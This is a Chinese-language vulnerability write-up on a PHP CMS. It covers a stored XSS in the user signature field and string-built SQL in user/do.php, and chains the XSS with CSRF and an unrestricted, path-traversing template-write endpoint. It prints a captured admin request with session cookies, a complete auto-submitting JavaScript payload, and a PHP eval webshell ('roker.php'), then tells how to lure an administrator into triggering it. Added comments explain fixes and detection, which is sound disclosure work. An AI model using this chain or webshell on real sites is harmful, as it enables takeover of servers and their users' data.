这个 CMS 以前 90 有人发了个 getshell，当时是后台验证文件的问题。
官网已经修补了，所以重新下了源码。
因为后台登入还需要认证码，所以注入就没看了。
存在 XSS。
漏洞文件 user/member/skin_edit.php
<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
</textarea></td></tr>
user/do.php
if($op=='zl'){ // profile data
    // Only presence is checked. No field is validated for format or length,
    // and nothing in this block escapes a value before it is concatenated
    // into the SQL string below; whether that is injectable depends on
    // filtering done before this block, which is not shown here.
    if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
        exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
    // UPDATE built by string concatenation from form-submitted values
    // (the skin_edit.php form field is named CS_Qianm, matching the column).
    // CS_Sex is interpolated without quotes. A prepared statement with bound
    // parameters would remove the injection question regardless of upstream
    // filtering.
    // CS_Qianm (the signature) is stored as received; the skin_edit.php
    // excerpt in the post then echoes $cscms_qianm without htmlspecialchars(),
    // which is the stored XSS — the fix belongs at output (encode on echo),
    // not only here.
    $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
where CS_Name='".$cscms_name."'";
    if($db->query($sql)){
        exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
    }else{
        exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
    }
}
写入时没有过滤，skin_edit.php 输出时又是直接 echo（没有 htmlspecialchars），所以产生存储型 XSS；在输出处做 HTML 编码即可修复。
后台看了下，很奇葩的是可以写任意格式文件。
抓包：
POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 127.0.0.1
Content-Length: 38
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594

name=aaa.php&content=%3Cs%3E%3Ca%25%3E
于是构造 JS 如下。
<script>
// Reviewer note: this is the CSRF payload the post stores in the signature
// field. It runs in the browser of whoever views the signature; if that
// viewer is logged into the admin panel, the browser attaches the admin
// cookies to the forged POST below. Nothing here bypasses authentication —
// it works only because the endpoint trusts the cookie session alone.
// (thisTHost is assigned without var, i.e. an implicit global.)
thisTHost = top.location.hostname;
// Target: the template-edit action. `path` is a traversal string the server
// accepts as-is (per the captured request above); the server-side fix is to
// resolve it against the skins root and reject anything that escapes it.
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
// Builds and auto-submits a hidden form carrying the `name` and `content`
// fields that skins.php reads.
//   url  - endpoint the form posts to
//   data - value of the `name` field (file name the server writes)
//   msg  - value of the `content` field (file body)
// The captured request carries no anti-CSRF token, and the post says the
// extension of `name` is not restricted. A per-session token checked on
// this action plus an extension allowlist closes both halves; a
// SameSite=Lax/Strict admin cookie would also keep the session off this
// cross-site POST.
function PostSubmit(url, data, msg) {
var postUrl = url;
var postData = data;
var msgData = msg;
var ExportForm = document.createElement("FORM");
document.body.appendChild(ExportForm);
ExportForm.method = "POST";
var newElement = document.createElement("input");
newElement.setAttribute("name", "name");
newElement.setAttribute("type", "hidden");
var newElement2 = document.createElement("input");
newElement2.setAttribute("name", "content");
newElement2.setAttribute("type", "hidden");
ExportForm.appendChild(newElement);
ExportForm.appendChild(newElement2);
newElement.value = postData;
newElement2.value = msgData;
ExportForm.action = postUrl;
ExportForm.submit();
};
// Writes the one-line PHP shell named in the post as roker.php under the
// traversed path. On the detection side: an admin-panel write whose Referer
// is a user-profile page, and any new .php file under skins/, are both
// worth alerting on.
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
</script>
在 http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处插入上面的脚本。
用你的账号给管理员写个私信，或者让他访问你的主页 http://127.0.0.1/home/?uid=2（uid 自己改），
就会在 skins\index\html\ 目录下生成 roker.php 一句话。
整条链依赖三点：签名输出不编码、skins.php 没有 CSRF token、写文件不限制扩展名和 path；修掉任意一点都能断掉。